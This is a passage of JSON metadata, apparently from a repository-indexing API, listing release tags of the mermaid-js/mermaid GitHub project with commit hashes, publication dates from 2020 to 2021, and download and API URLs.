maid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/ta